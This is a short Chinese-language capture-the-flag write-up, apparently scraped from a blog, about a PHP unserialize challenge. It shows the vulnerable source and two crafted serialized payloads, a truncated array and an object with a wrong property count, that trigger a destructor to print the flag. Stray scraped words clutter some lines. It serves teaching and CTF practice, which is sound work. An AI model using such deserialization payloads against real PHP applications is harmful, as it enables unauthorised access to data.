https://ctftime.org/task/7404php
PHP's unserialization mechanism can be exceptional.數組
程序代碼code
<?php $line = trim(fgets(STDIN)); $flag = file_get_contents('/flag'); class B { function __destruct() { global $flag; echo $flag; } } $a = @unserialize($line); throw new Exception('Well that was unexpected…'); echo $a;
咱們用如下代碼產生一個正常的序列:get
class B { } $a = array(1,2,new B(),3,4); echo serialize($a);
用以上代碼構造序列化數組:a:5:{i:0;i:1;i:1;i:2;i:2;O:1:"B":0:{}i:3;i:3;i:4;i:4;}
,把最後面的分號去掉變成a:5:{i:0;i:1;i:1;i:2;i:2;O:1:"B":0:{}i:3;i:3;i:4;i:4}
,將該序列發送給php程序便可顯示flag。io
<?php $test = new B(); $serialize_test = serialize($test); echo $serialize_test;
上述代碼會產生序列:O:1:"B":0:{}
,把0改爲1,序列變爲O:1:"B":1:{}
,把這個序列發送給php程序也能得到flag。function